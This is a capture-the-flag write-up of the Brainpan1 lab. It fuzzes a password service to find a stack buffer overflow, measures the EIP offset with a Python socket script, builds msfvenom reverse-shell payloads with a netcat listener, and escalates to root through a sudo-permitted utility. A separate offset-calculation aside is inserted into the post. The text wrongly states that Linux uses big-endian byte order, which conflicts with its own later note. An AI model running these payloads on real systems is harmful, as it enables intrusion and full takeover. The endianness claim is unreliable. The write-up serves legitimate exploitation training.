Brainpan1 - Buffer Overflow

Brainpan

Recon

Let’s get started with the nmap scan.

# nmap -Pn -A -T4 -oN brainpan1.nmap.txt 10.10.20.69
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-01 16:24 EST
Nmap scan report for 10.10.20.69
Host is up (0.079s latency).
Not shown: 998 closed ports
PORT      STATE SERVICE VERSION
9999/tcp  open  abyss?
| fingerprint-strings:
|   NULL:
|     _| _|
|     _|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_|
|     _|_| _| _| _| _| _| _| _| _| _| _| _|
|     _|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
|     [________________________ WELCOME TO BRAINPAN _________________________]
|_    ENTER THE PASSWORD
10000/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.3)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.3
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:

Network Distance: 4 hops

Some important observations -

  1. There is a service running on port 9999; we can try to connect and interact with it.
  2. Also, there is an HTTP service running on port 10000. We can fire up dirb or gobuster to scan for any exposed directories behind the home page.

# nc 10.10.20.69 9999
_|                            _|
_|_|_|    _|  _|_|    _|_|_|      _|_|_|    _|_|_|      _|_|_|  _|_|_|
_|    _|  _|_|      _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|    _|  _|        _|    _|  _|  _|    _|  _|    _|  _|    _|  _|    _|
_|_|_|    _|          _|_|_|  _|  _|    _|  _|_|_|      _|_|_|  _|    _|
                                            _|
                                            _|

[________________________ WELCOME TO BRAINPAN _________________________]
                          ENTER THE PASSWORD

                          >> aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
                          ACCESS DENIED

Looks like this service accepts a password string. I was able to crash the service after sending a really long string, and it took about 5 minutes for the service to come back online.

Gobuster Scan :

$ sudo gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url=http://10.10.20.69:10000
[sudo] password for eneloop:
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.20.69:10000
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/12/01 18:29:33 Starting gobuster
===============================================================
/bin (Status: 301)
Progress: 30709 / 220561 (13.92%)

While the scan was running, the initial directory scan results revealed the /bin directory, and inside this directory there is brainpan.exe. Let's download this file for examination.

Download Brainpan

# wget http://10.10.20.69:10000/bin/brainpan.exe
--2020-12-01 18:36:13--  http://10.10.20.69:10000/bin/brainpan.exe
Connecting to 10.10.20.69:10000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 21190 (21K) [application/x-msdos-program]
Saving to: ‘brainpan.exe’

brainpan.exe                  100%[==============================================>]  20.69K  --.-KB/s    in 0.08s

2020-12-01 18:36:13 (274 KB/s) - ‘brainpan.exe’ saved [21190/21190]

Enumeration

Copy the exe to a Windows machine where we can develop the exploit. Launch Immunity Debugger as administrator, open brainpan.exe and start the application. Please note that every time you crash the application during the exploit development stage, you will have to restart the debugger and run the application again.

Immunity Launch

Let's try sending inputs of increasing size to find a rough estimate of the length at which the buffer overflow is triggered.

# python ./fuzzer.py
Sending 100 bytes
Sending 200 bytes
Sending 300 bytes
Sending 400 bytes
Sending 500 bytes
Sending 600 bytes
Could not connect to 10.0.0.11:9999

Fuzzer

Now that the stack has overflowed and the EIP register was overwritten with 41414141 (AAAA), we can generate a cyclic pattern of 600 + 400 extra = 1000 bytes, which will help us identify the EIP offset.

# msf-pattern_create -l 1000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B

Now, let's send this payload using a script similar to the one below -

import socket

ip = "10.0.0.11"
port = 9999
prefix = ""
offset = 0
overflow = "A" * offset
retn = ""
padding = ""
# 1000-byte cyclic pattern generated with msf-pattern_create
payload = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
postfix = ""

buffer = prefix + overflow + retn + padding + payload + postfix

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    s.connect((ip, port))
    print("Sending buffer...")
    # Python 3 sockets take bytes; latin-1 maps each character to exactly one byte
    s.send((buffer + "\r\n").encode("latin-1"))
    print("Done!")
except OSError:
    print("Could not connect.")
finally:
    s.close()


This should crash the program again and the EIP will be filled with bytes from the cyclic pattern. We can locate this pattern to count the offset and that will allow us to control the EIP.

EIP Offset

The EIP offset is at 524.

# msf-pattern_offset -q 35724134
[*] Exact match at offset 524
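
How the value 35724134 seen in EIP maps to offset 524, as an added example that is not part of the original post and not Metasploit's code. It rebuilds the same Aa0Aa1Aa2... pattern and searches it for the four bytes behind the register value; the function names are chosen here for illustration.

```python
import string
import struct

# Every upper/lower/digit triple in order: "Aa0Aa1Aa2 ... Zz9" (20280 bytes).
FULL_PATTERN = "".join(
    u + l + d
    for u in string.ascii_uppercase
    for l in string.ascii_lowercase
    for d in string.digits
)


def pattern_create(length):
    """Return the first `length` bytes of the cyclic pattern."""
    if not 0 <= length <= len(FULL_PATTERN):
        raise ValueError("pattern repeats past %d bytes" % len(FULL_PATTERN))
    return FULL_PATTERN[:length]


def pattern_offset(register_hex, length=1000):
    """Return where the bytes shown in a 32-bit register sit in the pattern."""
    value = int(register_hex, 16)
    # The debugger prints the register as a number. x86 stores that number
    # least-significant byte first, so 0x35724134 was the byte string
    # 34 41 72 35 ("4Ar5") in the data that was sent.
    needle = struct.pack("<I", value)
    offset = pattern_create(length).encode("ascii").find(needle)
    if offset < 0:
        raise ValueError("register value does not come from the pattern")
    return offset


if __name__ == "__main__":
    print(pattern_offset("35724134"))
```

A value such as 41414141 raises `ValueError`, which is the expected result when the crash came from a plain run of A's rather than from the pattern.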

Let's validate that by overwriting the EIP register with BBBB (42’s) by specifying that as the return address. Now, restart Immunity and kick off the script above with BBBB as the return address.

EIP BBBB

Nice! This proves we are on the right track so far. Now, let's identify if there are any bad characters that we should avoid when building the exploit.

Generate Byte array

No Bad Characters exist

Exploit

Now, we are ready for developing the exploit as there are no bad characters. Using mona, identify the JMP addresses we can use. In this case, there is only one usable pointer.

I ran another nmap scan with the -O option and determined that the OS of brainpan was Linux, which uses big endian format so we will use the return address as we see it.

Now, generate the exploit using a command similar to below -

msfvenom -p windows/shell_reverse_tcp LHOST=<YOUR IP> LPORT=4444 EXITFUNC=thread -b  "\x00" -f py

Now, start a listener locally on port 4444, restart Immunity Debugger and make sure to run the application. When you run the exploit, you should have the shell.

$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.0.0.8] from (UNKNOWN) [10.0.0.11] 49718
Microsoft Windows [Version 10.0.19042.630]
(c) 2020 Microsoft Corporation. All rights reserved.

Please note that the return address is in reverse as we developed on a Windows machine which is a little endian format. When you generate and run the exploit against the real machine, please update the address.

Post-Exploitation/Privesc

Before I realized it was a Linux machine running Windows using the WINE emulator, I found myself inside the Wine environment as I used the Windows reverse shell exploit.

Z:\home\puck>dir
Volume in drive Z has no label.
Volume Serial Number is 0000-0000

Directory of Z:\home\puck

  3/6/2013   2:23 PM  <DIR>         .
  3/4/2013  10:49 AM  <DIR>         ..
  3/6/2013   2:23 PM           513  checksrv.sh
  3/4/2013   1:45 PM  <DIR>         web
       1 file                       513 bytes
       3 directories     13,823,844,352 bytes free


Z:\home\puck>type checksrv.sh
#!/bin/bash
# run brainpan.exe if it stops
lsof -i:9999
if [[ $? -eq 1 ]]; then 
	pid=`ps aux | grep brainpan.exe | grep -v grep`
	if [[ ! -z $pid ]]; then
		kill -9 $pid
		killall wineserver
		killall winedevice.exe
	fi
	/usr/bin/wine /home/puck/web/bin/brainpan.exe &
fi 

# run SimpleHTTPServer if it stops
lsof -i:10000
if [[ $? -eq 1 ]]; then 
	pid=`ps aux | grep SimpleHTTPServer | grep -v grep`
	if [[ ! -z $pid ]]; then
		kill -9 $pid
	fi
	cd /home/puck/web
	/usr/bin/python -m SimpleHTTPServer 10000
fi 

Here is the next attempt with the correct shell -

# msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.6.19.215 LPORT=4444 EXITFUNC=thread -b  "\x00" -f py
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 95 (iteration=0)
x86/shikata_ga_nai chosen with final size 95
Payload size: 95 bytes
Final size of py file: 479 bytes

Jailbreak to the shell using python -

$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.6.19.215] from (UNKNOWN) [10.10.151.71] 54169
ls
checksrv.sh
web
python -c 'import pty;pty.spawn("/bin/bash")';
puck@brainpan:/home/puck$ 
puck@brainpan:/home$ id
id
uid=1002(puck) gid=1002(puck) groups=1002(puck)
puck@brainpan:/home$ sudo -l
sudo -l
Matching Defaults entries for puck on this host:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User puck may run the following commands on this host:
    (root) NOPASSWD: /home/anansi/bin/anansi_util
puck@brainpan:/home$ 

I then downloaded linPEAS anyway and ran the scan to identify some interesting info as shown below -

root       810  0.0  0.0   2620   800 ?        Ss   17:26   0:00 cron
root       892  0.0  0.0   3180  1144 ?        S    17:27   0:00  \_ CRON
puck       893  0.0  0.0   2232   540 ?        Ss   17:27   0:00      \_ /bin/sh -c /home/puck/checksrv.sh
puck       894  0.0  0.0   5176  1288 ?        S    17:27   0:00          \_ /bin/bash cd 
puck       906  0.9  0.2  12396  6152 ?        S    17:27   1:02              \_ /usr/bin/python -m SimpleHTTPServer 10000


[+] Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
Matching Defaults entries for puck on this host:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User puck may run the following commands on this host:
    (root) NOPASSWD: /home/anansi/bin/anansi_util


[+] Searching uncommon passwd files (splunk)
backup-manager file: /etc/cron.daily/passwd
backup-manager file: /etc/init.d/passwd
backup-manager file: /etc/pam.d/passwd
backup-manager file: /usr/share/bash-completion/completions/passwd
backup-manager file: /usr/share/lintian/overrides/passwd

After playing with /home/anansi/bin/anansi_util for a while I was able to break in as root -

puck@brainpan:/home$ sudo /home/anansi/bin/anansi_util manual bash -i
sudo /home/anansi/bin/anansi_util manual bash -i
No manual entry for manual
uid=0(root) gid=0(root) groups=0(root)
!done  (press RETURN)

BrainPan is done!